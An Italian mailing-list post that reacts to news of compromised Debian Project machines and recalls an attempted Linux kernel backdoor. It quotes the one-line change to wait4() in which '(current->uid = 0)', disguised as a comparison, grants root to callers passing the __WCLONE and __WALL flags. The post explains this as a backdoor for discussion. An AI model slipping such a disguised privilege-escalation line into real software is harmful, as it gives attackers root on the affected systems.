Nando Santagata wrote:
...la buona e` che la Debian 3.0 r2 doveva uscire oggi.
La cattiva e`:
Some Debian Project machines have been compromised
[...]
Troppo accanimento in questo periodo contro Linux, con ogni mezzo:
dopo la modifica "innocente" al codice della wait4()
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
che inserisce una backdoor per dare ad un programma privilegi di root
(uid=0), ne caso abbia i flag __WCLONE e __WALL attivi,
adesso il tentativo di compromissione di alcune macchine della Debian,
che al di la` della riuscita o meno, comunque lasciano pensare...
Che neanche gli avvocati bastino piu` ? :-)
Matteo
--
http://linux-4d.sourceforge.net
|